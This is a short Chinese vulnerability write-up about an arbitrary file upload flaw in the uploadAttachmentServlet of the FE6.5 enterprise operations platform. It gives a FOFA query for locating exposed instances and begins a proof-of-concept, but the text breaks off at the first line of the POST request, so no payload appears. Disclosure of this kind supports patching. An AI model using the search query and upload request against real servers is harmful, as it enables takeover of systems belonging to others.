0x01 产品介绍
FE企业运营管理平台(以下简称FE6.5)是基于互联企业云工作台,以移动技术、云计算、大数据处理技术、传感技术等信息技术为支撑,和各类业务系统全面融合的移动化云平台,分为企业版和集团版,能满足各种规模企业的信息化建设需求。FE6.5以移动、平台、社交、云及大数据四大能力为核心,推进企事业单位的全面移动化,构建与业务系统全面融合的企业运营管理平台。
0x02 漏洞概述
uploadAttachmentServlet存在文件上传漏洞,攻击者可利用该漏洞上传脚本文件,进而获取服务器权限。
搜索语法
fofa语法查找:body=”/login/indexPicXml_valid.jsp?p=”
影响版本:
飞企互联-FE企业运营管理平台
0x03 漏洞复现
页面
poc:
POST /servlet/uploadAttachmentServlet HTT